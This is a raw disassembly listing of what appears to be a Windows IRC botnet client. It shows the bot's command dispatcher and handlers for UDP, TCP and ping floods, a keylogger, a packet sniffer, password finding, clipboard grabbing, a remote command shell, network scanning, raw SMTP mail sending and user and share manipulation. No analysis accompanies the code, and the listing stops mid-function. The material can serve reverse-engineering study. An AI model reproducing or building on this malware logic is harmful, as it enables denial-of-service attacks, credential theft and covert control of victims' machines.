repe cmpsb
jnz short loc_40AA04
call sub_407554
test eax, eax
mov eax, offset aMainRebootingS ; "[MAIN]: Rebooting system."
jnz short loc_40A9D5
mov eax, offset aMainFailedToRe ; "[MAIN]: Failed to reboot system."
loc_40A9D5: ; CODE XREF: sub_409848+1186�j
push eax
lea eax, [ebp+var_2F0]
push eax
call sub_416975
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 1Ch
jmp loc_40EE4D
; ---------------------------------------------------------------------------
loc_40AA04: ; CODE XREF: sub_409848+1178�j
push 8
mov edi, eax
mov esi, offset aThreads ; "threads"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E8E4
push 2
mov edi, eax
mov esi, offset aT ; "t"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E8E4
push 8
mov edi, eax
mov esi, offset aAliases ; "aliases"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E8C1
push 3
mov edi, eax
mov esi, offset aAl ; "al"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E8C1
push 4
mov edi, eax
mov esi, offset aLog_0 ; "log"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E7CE
push 3
mov edi, eax
mov esi, offset aLg ; "lg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E7CE
push 9
mov edi, eax
mov esi, offset aClearlog ; "clearlog"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E7B2
push 4
mov edi, eax
mov esi, offset aClg ; "clg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E7B2
push 8
mov edi, eax
mov esi, offset aNetinfo ; "netinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E777
push 3
mov edi, eax
mov esi, offset aNi ; "ni"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E777
push 8
mov edi, eax
mov esi, offset aSysinfo ; "sysinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E74B
push 3
mov edi, eax
mov esi, offset aSi ; "si"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E74B
push 8
mov edi, eax
mov esi, offset aDestroy ; "destroy"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E6CE
push 0Bh
mov edi, eax
mov esi, offset aErradicate ; "erradicate"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E6CE
push 6
mov edi, eax
mov esi, offset aProcs ; "procs"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E5A8
push 3
mov edi, eax
mov esi, offset aPs ; "ps"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E5A8
push 7
mov edi, eax
mov esi, offset aUptime ; "uptime"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E521
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E521
push 0Ah
mov edi, eax
mov esi, offset aDriveinfo ; "driveinfo"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E504
push 4
mov edi, eax
mov esi, offset aDrv ; "drv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E504
push 9
mov edi, eax
mov esi, offset aTestdlls ; "testdlls"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4EB
push 4
mov edi, eax
mov esi, offset aDll ; "dll"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4EB
push 8
mov edi, eax
mov esi, offset aOpencmd ; "opencmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4AC
push 5
mov edi, eax
mov esi, offset aOcmd ; "ocmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E4AC
push 8
mov edi, eax
mov esi, offset aCmdstop ; "cmdstop"
pop ecx
xor edx, edx
repe cmpsb
jnz short loc_40AC0C
push [ebp+ebx+var_A0]
push 8
push offset aRemoteShell ; "Remote shell"
push offset aCmd_0 ; "[CMD]"
jmp loc_40EB09
; ---------------------------------------------------------------------------
loc_40AC0C: ; CODE XREF: sub_409848+13AA�j
push 4
mov edi, eax
mov esi, offset aWho ; "who"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40AF4B
cmp [ebp+var_C], edx
jnz short loc_40AC3F
push edx
push [ebp+var_4]
push offset aLoginList ; "-[Login List]-"
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 14h
loc_40AC3F: ; CODE XREF: sub_409848+13DB�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40AC44: ; CODE XREF: sub_409848+1443�j
cmp byte ptr [edi], 0
lea eax, [edi+1]
jnz short loc_40AC51
mov eax, offset aEmpty ; "<Empty>"
loc_40AC51: ; CODE XREF: sub_409848+1402�j
push eax
push esi
lea eax, [ebp+var_2F0]
push offset aD_S ; "%d. %s"
push eax
call sub_416975
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D62
add esp, 24h
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40AC44
push offset aMainLoginListC ; "[MAIN]: Login list complete."
call sub_401F0F
mov eax, [ebp+var_1C]
pop ecx
loc_40AC9B: ; CODE XREF: sub_409848+2698�j
; sub_409848+561F�j
mov ecx, [ebp+ebx+var_94]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_409AC6
push 8
mov edi, eax
mov esi, offset aAdvscan ; "advscan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F4B4
push 4
mov edi, eax
mov esi, offset aAsc ; "asc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F4B4
push 9
mov edi, eax
mov esi, offset aUdpflood ; "udpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F36B
push 4
mov edi, eax
mov esi, offset aUdp ; "udp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F36B
push 2
mov edi, eax
mov esi, offset aU ; "u"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F36B
push 0Ah
mov edi, eax
mov esi, offset aPingflood ; "pingflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F231
push 5
mov edi, eax
mov esi, offset aPing_0 ; "ping"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F231
push 2
mov edi, eax
mov esi, offset aP ; "p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F231
push 9
mov edi, eax
mov esi, offset aTcpflood ; "tcpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F070
push 4
mov edi, eax
mov esi, offset aTcp ; "tcp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40F070
push 6
mov edi, eax
mov esi, offset aEmail ; "email"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40EE7A
mov eax, [ebp+ebx+var_A0]
lea edx, [ebp+var_85C]
sub edx, eax
loc_40AD98: ; CODE XREF: sub_409848+1558�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40AD98
push [ebp+ebx+var_9C]
call sub_416D02
mov esi, eax
mov eax, [ebp+ebx+var_98]
lea edx, [ebp+var_2004]
pop ecx
sub edx, eax
loc_40ADC0: ; CODE XREF: sub_409848+1580�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40ADC0
mov eax, [ebp+arg_0]
lea edx, [ebp+var_155C]
sub edx, eax
loc_40ADD5: ; CODE XREF: sub_409848+1595�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_40ADD5
push offset asc_422B00 ; " "
push offset a_ ; "_"
push [ebp+ebx+var_90]
call sub_4071CF
add esp, 0Ch
lea edx, [ebp+var_1F04]
loc_40ADFE: ; CODE XREF: sub_409848+15BE�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_40ADFE
lea eax, [ebp+var_1854]
push eax
push 101h
call dword_43A3CC ; WSAStartup
lea eax, [ebp+var_85C]
push eax
call dword_43A420 ; gethostbyname
push 6
push 1
push 2
mov ebx, eax
call dword_43A3BC ; socket
mov edi, eax
mov [ebp+var_D8], 2
mov eax, [ebx+0Ch]
mov eax, [eax]
mov eax, [eax]
push esi
mov [ebp+var_D4], eax
call dword_43A514 ; ntohs
mov [ebp+var_D6], ax
lea eax, [ebp+var_1F04]
push eax
lea eax, [ebp+var_2004]
push eax
lea eax, [ebp+var_1F04]
push eax
lea eax, [ebp+var_155C]
push eax
lea eax, [ebp+var_2004]
push eax
lea eax, [ebp+var_2804]
push offset aHeloRndnickMai ; "helo $rndnick\nmail from: <%s>\nrcpt to: "...
push eax
call sub_416975
add esp, 1Ch
push 10h
lea eax, [ebp+var_D8]
push eax
push edi
call dword_43A36C ; connect
xor ebx, ebx
push ebx
mov esi, 100h
push esi
lea eax, [ebp+var_1E00]
push eax
push edi
call dword_43A324 ; recv
lea eax, [ebp+var_1E00]
lea ecx, [eax+1]
loc_40AEC2: ; CODE XREF: sub_409848+167F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AEC2
push ebx
sub eax, ecx
push eax
lea eax, [ebp+var_2804]
push eax
push edi
call dword_43A458 ; send
push ebx
push esi
lea eax, [ebp+var_1E00]
push eax
push edi
call dword_43A324 ; recv
push edi
call dword_43A4D0 ; closesocket
call dword_43A4DC ; WSACleanup
lea eax, [ebp+var_155C]
push eax
lea eax, [ebp+var_2F0]
push offset aEmailMessageSe ; "[EMAIL]: Message sent to %s."
push eax
call sub_416975
add esp, 0Ch
cmp [ebp+var_C], ebx
jnz short loc_40AF34
push ebx
loc_40AF19: ; CODE XREF: sub_409848+2127�j
; sub_409848+4032�j
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
loc_40AF2C: ; CODE XREF: sub_409848+3457�j
call sub_405D62
add esp, 14h
loc_40AF34: ; CODE XREF: sub_409848+16CE�j
; sub_409848+211F�j ...
mov esi, [ebp+arg_24]
loc_40AF37: ; CODE XREF: sub_409848+3FC7�j
; sub_409848+3FEA�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401F0F
pop ecx
mov eax, esi
jmp loc_409AC9
; ---------------------------------------------------------------------------
loc_40AF4B: ; CODE XREF: sub_409848+13D2�j
push 8
mov edi, eax
mov esi, offset aGetclip ; "getclip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E468
push 3
mov edi, eax
mov esi, offset aGc ; "gc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E468
push 9
mov edi, eax
mov esi, offset aFlusharp ; "flusharp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E43D
push 5
mov edi, eax
mov esi, offset aFarp ; "farp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E43D
push 9
mov edi, eax
mov esi, offset aFlushdns ; "flushdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E40D
push 5
mov edi, eax
mov esi, offset aFdns ; "fdns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E40D
push 0Ah
mov edi, eax
mov esi, offset aCurrentip ; "currentip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E3D3
push 4
mov edi, eax
mov esi, offset aCip ; "cip"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E3D3
push 0Dh
mov edi, eax
mov esi, offset aRloginserver ; "rloginserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E29A
push 7
mov edi, eax
mov esi, offset aRlogin ; "rlogin"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E29A
push 0Bh
mov edi, eax
mov esi, offset aHttpserver ; "httpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E119
push 5
mov edi, eax
mov esi, offset aHttp ; "http"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40E119
push 0Bh
mov edi, eax
mov esi, offset aTftpserver ; "tftpserver"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DFC2
push 5
mov edi, eax
mov esi, offset aTftp ; "tftp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DFC2
push 9
mov edi, eax
mov esi, offset aFindpass ; "findpass"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DF1A
push 3
mov edi, eax
mov esi, offset aFp ; "fp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DF1A
push 8
mov edi, eax
mov esi, offset aScanall ; "scanall"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBDF
push 3
mov edi, eax
mov esi, offset aSa ; "sa"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBDF
mov ecx, [ebp+ebx+var_A0]
test ecx, ecx
mov [ebp+var_8], ecx
jz loc_409AC6
push 5
mov edi, eax
mov esi, offset aNick_0 ; "nick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBBA
push 2
mov edi, eax
mov esi, offset aN ; "n"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DBBA
push 5
mov edi, eax
mov esi, offset aJoin ; "join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB96
push 2
mov edi, eax
mov esi, offset aJ ; "j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB96
push 5
mov edi, eax
mov esi, offset aPart_0 ; "part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB7C
push 3
mov edi, eax
mov esi, offset aPt ; "pt"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB7C
push 4
mov edi, eax
mov esi, offset aRaw ; "raw"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB45
push 2
mov edi, eax
mov esi, offset aR ; "r"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DB45
push 0Bh
mov edi, eax
mov esi, offset aKillthread ; "killthread"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DA8B
push 2
mov edi, eax
mov esi, offset aK ; "k"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40DA8B
push 7
mov edi, eax
mov esi, offset aC_quit ; "c_quit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D9DD
push 4
mov edi, eax
mov esi, offset aC_q ; "c_q"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D9DD
push 0Ah
mov edi, eax
mov esi, offset aC_rndnick ; "c_rndnick"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D98C
push 5
mov edi, eax
mov esi, offset aC_rn ; "c_rn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D98C
push 7
mov edi, eax
mov esi, offset aPrefix ; "prefix"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D973
push 3
mov edi, eax
mov esi, offset aPr ; "pr"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D973
push 5
mov edi, eax
mov esi, offset aOpen ; "open"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D93D
push 2
mov edi, eax
mov esi, offset aO ; "o"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D93D
push 7
mov edi, eax
mov esi, offset aServer ; "server"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D914
push 3
mov edi, eax
mov esi, offset aSe ; "se"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D914
push 4
mov edi, eax
mov esi, offset aDns ; "dns"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8B2
push 3
mov edi, eax
mov esi, offset aDn ; "dn"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D8B2
push 9
mov edi, eax
mov esi, offset aKillproc ; "killproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D87F
push 3
mov edi, eax
mov esi, offset aKp ; "kp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D87F
push 0Ch
mov edi, eax
mov esi, offset aKilldelproc ; "killdelproc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D837
push 4
mov edi, eax
mov esi, offset aKdp ; "kdp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D837
push 5
mov edi, eax
mov esi, offset aKill ; "kill"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7D6
push 3
mov edi, eax
mov esi, offset aKi ; "ki"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D7D6
push 7
mov edi, eax
mov esi, offset aDelete ; "delete"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D790
push 4
mov edi, eax
mov esi, offset aDel ; "del"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D790
push 5
mov edi, eax
mov esi, offset aList_0 ; "list"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D770
push 3
mov edi, eax
mov esi, offset aLi ; "li"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D770
push 6
mov edi, eax
mov esi, offset aVisit ; "visit"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D67E
push 2
mov edi, eax
mov esi, offset aV ; "v"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D67E
push 8
mov edi, eax
mov esi, offset aMirccmd ; "mirccmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D605
push 5
mov edi, eax
mov esi, offset aMirc ; "mirc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D605
push 4
mov edi, eax
mov esi, offset aCmd ; "cmd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5A9
push 3
mov edi, eax
mov esi, offset aCm ; "cm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D5A9
push 9
mov edi, eax
mov esi, offset aReadfile ; "readfile"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D51E
push 3
mov edi, eax
mov esi, offset aRf ; "rf"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40D51E
push 7
mov edi, eax
mov esi, offset aPsniff ; "psniff"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40B53D
mov edi, [ebp+var_8]
push 3
mov esi, offset aOn ; "on"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40B508
push 19h
call sub_413922
test eax, eax
pop ecx
jle short loc_40B424
push offset aPsniffAlreadyR ; "[PSNIFF]: Already running."
jmp loc_40B5A6
; ---------------------------------------------------------------------------
loc_40B424: ; CODE XREF: sub_409848+1BD0�j
mov eax, [ebp+arg_4]
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
mov [ebp+var_384], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
mov eax, [ebp+var_C]
mov [ebp+var_2F8], eax
jz short loc_40B44E
mov eax, ebx
jmp short loc_40B469
; ---------------------------------------------------------------------------
loc_40B44E: ; CODE XREF: sub_409848+1C00�j
xor ecx, ecx
mov eax, offset aSniffing ; "#sniffing"
inc ecx
mov edi, 422B02h
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_40B469
mov eax, [ebp+var_9C]
loc_40B469: ; CODE XREF: sub_409848+1C04�j
; sub_409848+1C19�j
push eax
lea eax, [ebp+var_380]
push 80h
push eax
call sub_416BCD
lea eax, [ebp+var_2F0]
push offset aPsniffCarnivor ; "[PSNIFF]: Carnivore packet sniffer acti"...
push eax
call sub_416975
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 19h
push eax
call sub_413732
add esp, 20h
mov [ebp+var_300], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_384]
push eax
push offset sub_409180
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_300]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jz short loc_40B4F7
cmp [ebp+var_2F4], esi
jnz loc_40EE2A
loc_40B4E1: ; CODE XREF: sub_409848+1CA8�j
push 32h
call dword_422000 ; Sleep
cmp [ebp+var_2F4], 0
jz short loc_40B4E1
jmp loc_40EE2A
; ---------------------------------------------------------------------------
loc_40B4F7: ; CODE XREF: sub_409848+1C8B�j
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aPsniffFailedTo ; "[PSNIFF]: Failed to start sniffer threa"...
jmp loc_40EE1B
; ---------------------------------------------------------------------------
loc_40B508: ; CODE XREF: sub_409848+1BC0�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aOff ; "off"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40EE2A
push eax
push 19h
call sub_4138D5
test eax, eax
pop ecx
pop ecx
jle short loc_40B536
push eax
push offset aPsniffCarniv_0 ; "[PSNIFF]: Carnivore stopped. (%d thread"...
jmp loc_40EE1B
; ---------------------------------------------------------------------------
loc_40B536: ; CODE XREF: sub_409848+1CE1�j
push offset aPsniffNoCarniv ; "[PSNIFF]: No Carnivore thread found."
jmp short loc_40B5A6
; ---------------------------------------------------------------------------
loc_40B53D: ; CODE XREF: sub_409848+1BAB�j
push 7
mov edi, eax
mov esi, offset aKeylog ; "keylog"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40B6C0
mov edi, [ebp+var_8]
push 3
mov esi, offset aOn ; "on"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40B5B9
mov edi, [ebp+var_8]
push 5
mov esi, offset aFile ; "file"
pop ecx
xor eax, eax
repe cmpsb
jz short loc_40B5B9
mov edi, [ebp+var_8]
push 4
mov esi, offset aOff ; "off"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40EE2A
push eax
push 1Bh
call sub_4138D5
test eax, eax
pop ecx
pop ecx
jle short loc_40B5A1
push eax
push offset aKeylogKeyLogge ; "[KEYLOG]: Key logger stopped. (%d threa"...
jmp loc_40EE1B
; ---------------------------------------------------------------------------
loc_40B5A1: ; CODE XREF: sub_409848+1D4C�j
push offset aKeylogNoKeyLog ; "[KEYLOG]: No key logger thread found."
loc_40B5A6: ; CODE XREF: sub_409848+1BD7�j
; sub_409848+1CF3�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_416975
pop ecx
pop ecx
jmp loc_40EE2A
; ---------------------------------------------------------------------------
loc_40B5B9: ; CODE XREF: sub_409848+1D18�j
; sub_409848+1D29�j
push 1Bh
call sub_413922
test eax, eax
pop ecx
jle short loc_40B5CC
push offset aKeylogAlreadyR ; "[KEYLOG]: Already running."
jmp short loc_40B5A6
; ---------------------------------------------------------------------------
loc_40B5CC: ; CODE XREF: sub_409848+1D7B�j
mov eax, [ebp+arg_4]
mov edi, [ebp+var_8]
mov [ebp+var_384], eax
mov eax, [ebp+var_4]
mov [ebp+var_2FC], eax
push 5
mov esi, offset aFile ; "file"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B5FB
mov [ebp+var_2F8], 1
jmp short loc_40B604
; ---------------------------------------------------------------------------
loc_40B5FB: ; CODE XREF: sub_409848+1DA5�j
mov eax, [ebp+var_C]
mov [ebp+var_2F8], eax
loc_40B604: ; CODE XREF: sub_409848+1DB1�j
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40B613
mov eax, ebx
jmp short loc_40B62E
; ---------------------------------------------------------------------------
loc_40B613: ; CODE XREF: sub_409848+1DC5�j
xor ecx, ecx
mov eax, offset aHell_0 ; "#hell"
inc ecx
mov edi, 422B02h
mov esi, eax
xor edx, edx
repe cmpsb
jnz short loc_40B62E
mov eax, [ebp+var_9C]
loc_40B62E: ; CODE XREF: sub_409848+1DC9�j
; sub_409848+1DDE�j
push eax
lea eax, [ebp+var_37C]
push 80h
push eax
call sub_416BCD
lea eax, [ebp+var_2F0]
push offset aKeylogKeyLog_0 ; "[KEYLOG]: Key logger active."
push eax
call sub_416975
xor esi, esi
push esi
lea eax, [ebp+var_2F0]
push 1Bh
push eax
call sub_413732
add esp, 20h
mov [ebp+var_380], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_384]
push eax
push offset sub_405F16
push esi
push esi
call dword_42200C ; CreateThread
mov ecx, [ebp+var_380]
imul ecx, 234h
cmp eax, esi
mov dword_43B274[ecx], eax
jnz short loc_40B6B3
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aKeylogFailedTo ; "[KEYLOG]: Failed to start logging threa"...
jmp loc_40EE1B
; ---------------------------------------------------------------------------
loc_40B6AB: ; CODE XREF: sub_409848+1E71�j
push 32h
call dword_422000 ; Sleep
loc_40B6B3: ; CODE XREF: sub_409848+1E50�j
cmp [ebp+var_2F4], esi
jz short loc_40B6AB
jmp loc_40EE2A
; ---------------------------------------------------------------------------
loc_40B6C0: ; CODE XREF: sub_409848+1D03�j
push 4
mov edi, eax
mov esi, offset aNet ; "net"
pop ecx
xor edx, edx
repe cmpsb
jnz loc_40B974
xor eax, eax
cmp dword_43A528, eax
jz short loc_40B6F0
cmp dword_43A550, eax
jz short loc_40B6F0
push offset aNetFailedToLoa ; "[NET]: Failed to load advapi32.dll or n"...
jmp loc_40B955
; ---------------------------------------------------------------------------
loc_40B6F0: ; CODE XREF: sub_409848+1E94�j
; sub_409848+1E9C�j
cmp [ebp+var_14], eax
jz loc_40B963
mov eax, [ebp+ebx+var_9C]
and [ebp+arg_0], 0
test eax, eax
mov [ebp+var_10], eax
jz short loc_40B719
push eax
push [ebp+var_14]
call sub_417440
pop ecx
pop ecx
mov [ebp+arg_0], eax
loc_40B719: ; CODE XREF: sub_409848+1EC1�j
mov edx, [ebp+var_8]
push 6
mov edi, edx
mov esi, offset aStart ; "start"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B787
cmp [ebp+var_10], eax
jz short loc_40B755
push [ebp+arg_0]
push 3
loc_40B736: ; CODE XREF: sub_409848+1F54�j
; sub_409848+1F6B�j ...
call sub_4082EB
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_416975
add esp, 14h
jmp loc_40B963
; ---------------------------------------------------------------------------
loc_40B755: ; CODE XREF: sub_409848+1EE7�j
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_407A26
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40B77D
push offset aNetServiceList ; "[NET]: Service list completed."
jmp loc_40B95B
; ---------------------------------------------------------------------------
loc_40B77D: ; CODE XREF: sub_409848+1F29�j
push offset aNetServiceLi_0 ; "[NET]: Service list failed."
jmp loc_40B95B
; ---------------------------------------------------------------------------
loc_40B787: ; CODE XREF: sub_409848+1EE2�j
push 5
mov edi, edx
mov esi, offset aStop ; "stop"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B79E
push [ebp+arg_0]
push 4
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B79E: ; CODE XREF: sub_409848+1F4D�j
push 6
mov edi, edx
mov esi, offset aPause ; "pause"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B7B5
push [ebp+arg_0]
push 5
jmp short loc_40B736
; ---------------------------------------------------------------------------
loc_40B7B5: ; CODE XREF: sub_409848+1F64�j
push 9
mov edi, edx
mov esi, offset aContinue ; "continue"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B7CF
push [ebp+arg_0]
push 6
jmp loc_40B736
; ---------------------------------------------------------------------------
loc_40B7CF: ; CODE XREF: sub_409848+1F7B�j
push 7
mov edi, edx
mov esi, offset aDelete ; "delete"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B7E9
push [ebp+arg_0]
push 1
jmp loc_40B736
; ---------------------------------------------------------------------------
loc_40B7E9: ; CODE XREF: sub_409848+1F95�j
push 6
mov edi, edx
mov esi, offset aShare ; "share"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B86D
cmp [ebp+var_10], eax
jz short loc_40B839
cmp [ebp+var_38C], al
jz short loc_40B80E
push eax
push [ebp+var_10]
push 1
jmp short loc_40B81A
; ---------------------------------------------------------------------------
loc_40B80E: ; CODE XREF: sub_409848+1FBC�j
push [ebp+ebx+var_98]
push [ebp+var_10]
push 0
loc_40B81A: ; CODE XREF: sub_409848+1FC4�j
call sub_408363
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_416975
add esp, 18h
jmp loc_40B963
; ---------------------------------------------------------------------------
loc_40B839: ; CODE XREF: sub_409848+1FB4�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_408421
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40B863
push offset aNetShareListCo ; "[NET]: Share list completed."
jmp loc_40B95B
; ---------------------------------------------------------------------------
loc_40B863: ; CODE XREF: sub_409848+200F�j
push offset aNetShareListFa ; "[NET]: Share list failed."
jmp loc_40B95B
; ---------------------------------------------------------------------------
loc_40B86D: ; CODE XREF: sub_409848+1FAF�j
push 5
mov edi, edx
mov esi, offset aUser ; "user"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40B909
cmp [ebp+var_10], eax
jz short loc_40B8DB
cmp [ebp+var_38C], al
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
jz short loc_40B8A2
push eax
push [ebp+var_10]
push 1
jmp short loc_40B8BC
; ---------------------------------------------------------------------------
loc_40B8A2: ; CODE XREF: sub_409848+2050�j
mov ebx, [ebp+ebx+var_98]
test ebx, ebx
jz short loc_40B8B5
push ebx
push [ebp+var_10]
push 0
jmp short loc_40B8BC
; ---------------------------------------------------------------------------
loc_40B8B5: ; CODE XREF: sub_409848+2063�j
push 0
push [ebp+var_10]
push 2
loc_40B8BC: ; CODE XREF: sub_409848+2058�j
; sub_409848+206B�j
call sub_408540
push eax
lea eax, [ebp+var_2F0]
push offset aS_2 ; "%s"
push eax
call sub_416975
add esp, 24h
jmp loc_40B963
; ---------------------------------------------------------------------------
loc_40B8DB: ; CODE XREF: sub_409848+203C�j
push 0
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_40860A
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jz short loc_40B902
push offset aNetUserListCom ; "[NET]: User list completed."
jmp short loc_40B95B
; ---------------------------------------------------------------------------
loc_40B902: ; CODE XREF: sub_409848+20B1�j
